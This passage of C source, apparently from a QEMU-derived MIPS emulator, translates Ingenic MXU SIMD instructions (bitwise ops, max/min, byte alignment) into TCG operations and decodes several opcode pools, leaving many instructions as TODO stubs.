to all 0s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely(XRb == 0)) { /* XRb zero register -> just set destination to the content of XRc */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1]); } else if (unlikely(XRc == 0)) { /* XRc zero register -> just set destination to the content of XRb */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to one of them */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } } /* * S32XOR XRa, XRb, XRc * Update XRa with the result of logical bitwise 'xor' operation * applied to the content of XRb and XRc. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_S32XOR(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to all 0s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely(XRb == 0)) { /* XRb zero register -> just set destination to the content of XRc */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1]); } else if (unlikely(XRc == 0)) { /* XRc zero register -> just set destination to the content of XRb */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to all 0s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else { /* the most general case */ tcg_gen_xor_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } } /* * MXU instruction category max/min * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * S32MAX D16MAX Q8MAX * S32MIN D16MIN Q8MIN */ /* * S32MAX XRa, XRb, XRc * Update XRa with the maximum of signed 32-bit integers contained * in XRb and XRc. * * S32MIN XRa, XRb, XRc * Update XRa with the minimum of signed 32-bit integers contained * in XRb and XRc. 
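* For example (illustrative operand values): XRb = 0x00000005 (+5) and XRc = 0xFFFFFFFE (-2) would yield XRa = 0x00000005 under S32MAX and XRa = 0xFFFFFFFE under S32MIN, since the comparison is signed.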
* * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL00| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_S32MAX_S32MIN(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, opc, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); opc = extract32(ctx->opcode, 18, 3); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to zero */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely((XRb == 0) || (XRc == 0))) { /* exactly one operand is zero register - find which one is not...*/ uint32_t XRx = XRb ? XRb : XRc; /* ...and do max/min operation with a zero constant as the other operand */ TCGv_i32 t0 = tcg_const_i32(tcg_ctx, 0); if (opc == OPC_MXU_S32MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRx - 1], t0); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRx - 1], t0); } tcg_temp_free(tcg_ctx, t0); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to one of them */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ if (opc == OPC_MXU_S32MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } } } /* * D16MAX * Update XRa with the 16-bit-wise maximums of signed integers * contained in XRb and XRc. * * D16MIN * Update XRa with the 16-bit-wise minimums of signed integers * contained in XRb and XRc. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL00| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_D16MAX_D16MIN(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, opc, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); opc = extract32(ctx->opcode, 18, 3); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to zero */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely((XRb == 0) || (XRc == 0))) { /* exactly one operand is zero register - find which one is not...*/ uint32_t XRx = XRb ? 
XRb : XRc; /* ...and do half-word-wise max/min with one operand 0 */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_const_i32(tcg_ctx, 0); /* the left half-word first */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRx - 1], 0xFFFF0000); if (opc == OPC_MXU_D16MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } /* the right half-word */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRx - 1], 0x0000FFFF); /* move half-words to the leftmost position */ tcg_gen_shli_i32(tcg_ctx, t0, t0, 16); /* t0 will be max/min of t0 and t1 */ if (opc == OPC_MXU_D16MAX) { tcg_gen_smax_i32(tcg_ctx, t0, t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, t0, t0, t1); } /* return the resulting half-word to its original position */ tcg_gen_shri_i32(tcg_ctx, t0, t0, 16); /* finally update the destination */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRa - 1], t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to one of them */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new(tcg_ctx); /* the left half-word first */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0xFFFF0000); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFFFF0000); if (opc == OPC_MXU_D16MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } /* the right half-word */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0x0000FFFF); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0x0000FFFF); /* move half-words to the leftmost position */ tcg_gen_shli_i32(tcg_ctx, t0, t0, 16); tcg_gen_shli_i32(tcg_ctx, t1, t1, 16); /* t0 will be max/min of t0 and t1 */ if (opc == OPC_MXU_D16MAX) { tcg_gen_smax_i32(tcg_ctx, t0, t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, t0, t0, t1); } /* return the resulting half-word to its original position */ tcg_gen_shri_i32(tcg_ctx, t0, t0, 16); /* finally update the destination */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRa - 1], t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } } /* * Q8MAX * Update XRa with the 8-bit-wise maximums of signed integers * contained in XRb and XRc. * * Q8MIN * Update XRa with the 8-bit-wise minimums of signed integers * contained in XRb and XRc. 
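* For example (illustrative operand values): XRb = 0x7F8001FF (bytes +127, -128, +1, -1) and XRc = 0x00000000 would yield XRa = 0x7F000100 under Q8MAX and XRa = 0x008000FF under Q8MIN.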
* * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL00| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_Q8MAX_Q8MIN(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, opc, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); opc = extract32(ctx->opcode, 18, 3); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to zero */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely((XRb == 0) || (XRc == 0))) { /* exactly one operand is zero register - find which one is not...*/ uint32_t XRx = XRb ? XRb : XRc; /* ...and do byte-wise max/min with one operand 0 */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_const_i32(tcg_ctx, 0); int32_t i; /* the leftmost byte (byte 3) first */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRx - 1], 0xFF000000); if (opc == OPC_MXU_Q8MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } /* bytes 2, 1, 0 */ for (i = 2; i >= 0; i--) { /* extract the byte */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRx - 1], 0xFF << (8 * i)); /* move the byte to the leftmost position */ tcg_gen_shli_i32(tcg_ctx, t0, t0, 8 * (3 - i)); /* t0 will be max/min of t0 and t1 */ if (opc == OPC_MXU_Q8MAX) { tcg_gen_smax_i32(tcg_ctx, t0, t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, t0, t0, t1); } /* return the resulting byte to its original position */ tcg_gen_shri_i32(tcg_ctx, t0, t0, 8 * (3 - i)); /* finally update the destination */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRa - 1], t0); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to one of them */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new(tcg_ctx); int32_t i; /* the leftmost bytes (byte 3 of each) first */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0xFF000000); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFF000000); if (opc == OPC_MXU_Q8MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } /* bytes 2, 1, 0 */ for (i = 2; i >= 0; i--) { /* extract corresponding bytes */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0xFF << (8 * i)); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFF << (8 * i)); /* move the bytes to the leftmost position */ tcg_gen_shli_i32(tcg_ctx, t0, t0, 8 * (3 - i)); tcg_gen_shli_i32(tcg_ctx, t1, t1, 8 * (3 - i)); /* t0 will be max/min of t0 and t1 */ if (opc == OPC_MXU_Q8MAX) { tcg_gen_smax_i32(tcg_ctx, t0, t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, t0, t0, t1); } /* return the resulting byte to its original position */ tcg_gen_shri_i32(tcg_ctx, t0, t0, 8 * (3 - i)); /* finally update the destination */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRa - 1], t0); } 
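/* at this point every byte lane of XRa holds the byte-wise max/min of the corresponding XRb and XRc bytes */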
tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } } /* * MXU instruction category: align * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * S32ALN S32ALNI */ /* * S32ALNI XRc, XRb, XRa, optn3 * Arrange bytes from XRb and XRc according to one of five sets of * rules determined by optn3, and place the result in XRa. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+-----+---+-----+-------+-------+-------+-----------+ * | SPECIAL2 |optn3|0 0|x x x| XRc | XRb | XRa |MXU__POOL16| * +-----------+-----+---+-----+-------+-------+-------+-----------+ * */ static void gen_mxu_S32ALNI(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t optn3, pad, XRc, XRb, XRa; optn3 = extract32(ctx->opcode, 23, 3); pad = extract32(ctx->opcode, 21, 2); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to all 0s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely(XRb == 0)) { /* XRb zero register -> just appropriately shift XRc into XRa */ switch (optn3) { case MXU_OPTN3_PTN0: tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); break; case MXU_OPTN3_PTN1: case MXU_OPTN3_PTN2: case MXU_OPTN3_PTN3: tcg_gen_shri_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1], 8 * (4 - optn3)); break; case MXU_OPTN3_PTN4: tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1]); break; } } else if (unlikely(XRc == 0)) { /* XRc zero register -> just appropriately shift XRb into XRa */ switch (optn3) { case MXU_OPTN3_PTN0: tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); break; case MXU_OPTN3_PTN1: case MXU_OPTN3_PTN2: case MXU_OPTN3_PTN3: tcg_gen_shri_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], 8 * optn3); break; case MXU_OPTN3_PTN4: tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); break; } } else if (unlikely(XRb == XRc)) { /* both operands same -> just rotation or moving from any of them */ switch (optn3) { case MXU_OPTN3_PTN0: case MXU_OPTN3_PTN4: tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); break; case MXU_OPTN3_PTN1: case MXU_OPTN3_PTN2: case MXU_OPTN3_PTN3: tcg_gen_rotli_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], 8 * optn3); break; } } else { /* the most general case */ switch (optn3) { case MXU_OPTN3_PTN0: { /* */ /* XRb XRc */ /* +---------------+ */ /* | A B C D | E F G H */ /* +-------+-------+ */ /* | */ /* XRa */ /* */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } break; case MXU_OPTN3_PTN1: { /* */ /* XRb XRc */ /* +-------------------+ */ /* A | B C D E | F G H */ /* +---------+---------+ */ /* | */ /* XRa */ /* */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0x00FFFFFF); tcg_gen_shli_i32(tcg_ctx, t0, t0, 8); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFF000000); tcg_gen_shri_i32(tcg_ctx, t1, t1, 24); tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } break; case MXU_OPTN3_PTN2: { /* */ /* XRb XRc */ /* +-------------------+ */ /* A B | C D E F | G H */ /* 
+---------+---------+ */ /* | */ /* XRa */ /* */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0x0000FFFF); tcg_gen_shli_i32(tcg_ctx, t0, t0, 16); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFFFF0000); tcg_gen_shri_i32(tcg_ctx, t1, t1, 16); tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } break; case MXU_OPTN3_PTN3: { /* */ /* XRb XRc */ /* +-------------------+ */ /* A B C | D E F G | H */ /* +---------+---------+ */ /* | */ /* XRa */ /* */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0x000000FF); tcg_gen_shli_i32(tcg_ctx, t0, t0, 24); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFFFFFF00); tcg_gen_shri_i32(tcg_ctx, t1, t1, 8); tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } break; case MXU_OPTN3_PTN4: { /* */ /* XRb XRc */ /* +---------------+ */ /* A B C D | E F G H | */ /* +-------+-------+ */ /* | */ /* XRa */ /* */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1]); } break; } } } /* * Decoding engine for MXU * ======================= */ /* * * Decode MXU pool00 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0|x x x| XRc | XRb | XRa |MXU__POOL00| * +-----------+---------+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool00(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_S32MAX: case OPC_MXU_S32MIN: gen_mxu_S32MAX_S32MIN(ctx); break; case OPC_MXU_D16MAX: case OPC_MXU_D16MIN: gen_mxu_D16MAX_D16MIN(ctx); break; case OPC_MXU_Q8MAX: case OPC_MXU_Q8MIN: gen_mxu_Q8MAX_Q8MIN(ctx); break; case OPC_MXU_Q8SLT: /* TODO: Implement emulation of Q8SLT instruction. */ MIPS_INVAL("OPC_MXU_Q8SLT"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8SLTU: /* TODO: Implement emulation of Q8SLTU instruction. */ MIPS_INVAL("OPC_MXU_Q8SLTU"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool01 * * S32SLT, D16SLT, D16AVG, D16AVGR, Q8AVG, Q8AVGR: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0|x x x| XRc | XRb | XRa |MXU__POOL01| * +-----------+---------+-----+-------+-------+-------+-----------+ * * Q8ADD: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+-----+-----+-------+-------+-------+-----------+ * | SPECIAL2 |en2|0 0 0|x x x| XRc | XRb | XRa |MXU__POOL01| * +-----------+---+-----+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool01(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_S32SLT: /* TODO: Implement emulation of S32SLT instruction. */ MIPS_INVAL("OPC_MXU_S32SLT"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16SLT: /* TODO: Implement emulation of D16SLT instruction. */ MIPS_INVAL("OPC_MXU_D16SLT"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16AVG: /* TODO: Implement emulation of D16AVG instruction. 
*/ MIPS_INVAL("OPC_MXU_D16AVG"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16AVGR: /* TODO: Implement emulation of D16AVGR instruction. */ MIPS_INVAL("OPC_MXU_D16AVGR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8AVG: /* TODO: Implement emulation of Q8AVG instruction. */ MIPS_INVAL("OPC_MXU_Q8AVG"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8AVGR: /* TODO: Implement emulation of Q8AVGR instruction. */ MIPS_INVAL("OPC_MXU_Q8AVGR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8ADD: /* TODO: Implement emulation of Q8ADD instruction. */ MIPS_INVAL("OPC_MXU_Q8ADD"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool02 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0|x x x| XRc | XRb | XRa |MXU__POOL02| * +-----------+---------+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool02(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_S32CPS: /* TODO: Implement emulation of S32CPS instruction. */ MIPS_INVAL("OPC_MXU_S32CPS"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16CPS: /* TODO: Implement emulation of D16CPS instruction. */ MIPS_INVAL("OPC_MXU_D16CPS"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8ABD: /* TODO: Implement emulation of Q8ABD instruction. */ MIPS_INVAL("OPC_MXU_Q8ABD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SAT: /* TODO: Implement emulation of Q16SAT instruction. */ MIPS_INVAL("OPC_MXU_Q16SAT"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool03 * * D16MULF: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |x x|on2|0 0 0 0| XRc | XRb | XRa |MXU__POOL03| * +-----------+---+---+-------+-------+-------+-------+-----------+ * * D16MULE: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |x x|on2| Xd | XRc | XRb | XRa |MXU__POOL03| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool03(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 24, 2); switch (opcode) { case OPC_MXU_D16MULF: /* TODO: Implement emulation of D16MULF instruction. */ MIPS_INVAL("OPC_MXU_D16MULF"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16MULE: /* TODO: Implement emulation of D16MULE instruction. 
*/ MIPS_INVAL("OPC_MXU_D16MULE"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool04 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-+-------------------+-------+-----------+ * | SPECIAL2 | rb |x| s12 | XRa |MXU__POOL04| * +-----------+---------+-+-------------------+-------+-----------+ * */ static void decode_opc_mxu__pool04(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 20, 1); switch (opcode) { case OPC_MXU_S32LDD: case OPC_MXU_S32LDDR: gen_mxu_s32ldd_s32lddr(ctx); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool05 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-+-------------------+-------+-----------+ * | SPECIAL2 | rb |x| s12 | XRa |MXU__POOL05| * +-----------+---------+-+-------------------+-------+-----------+ * */ static void decode_opc_mxu__pool05(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 20, 1); switch (opcode) { case OPC_MXU_S32STD: /* TODO: Implement emulation of S32STD instruction. */ MIPS_INVAL("OPC_MXU_S32STD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32STDR: /* TODO: Implement emulation of S32STDR instruction. */ MIPS_INVAL("OPC_MXU_S32STDR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool06 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rb | rc |st2|x x x x| XRa |MXU__POOL06| * +-----------+---------+---------+---+-------+-------+-----------+ * */ static void decode_opc_mxu__pool06(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 10, 4); switch (opcode) { case OPC_MXU_S32LDDV: /* TODO: Implement emulation of S32LDDV instruction. */ 